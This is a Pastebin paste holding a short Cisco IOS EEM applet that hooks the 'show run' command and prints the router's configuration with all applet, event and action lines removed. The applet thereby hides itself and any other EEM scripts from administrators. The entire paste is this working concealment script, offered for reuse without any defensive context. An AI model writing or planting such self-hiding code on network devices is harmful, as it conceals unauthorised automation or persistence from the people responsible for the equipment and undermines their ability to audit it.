Advertisement
Jabbson

Cisco self-hiding eem sctipt

Jul 23rd, 2013
124
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.26 KB | None | 0 0
  1. event manager applet TheseAreNotTheAppletsYouAreLookingFor
  2. event cli pattern "show run" sync yes
  3. action 111 cli command "enable"
  4. action 112 cli command "show run | excl applet|event|action"
  5. action 113 puts "$_cli_result"
  6. action 114 set _exit_status "0"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement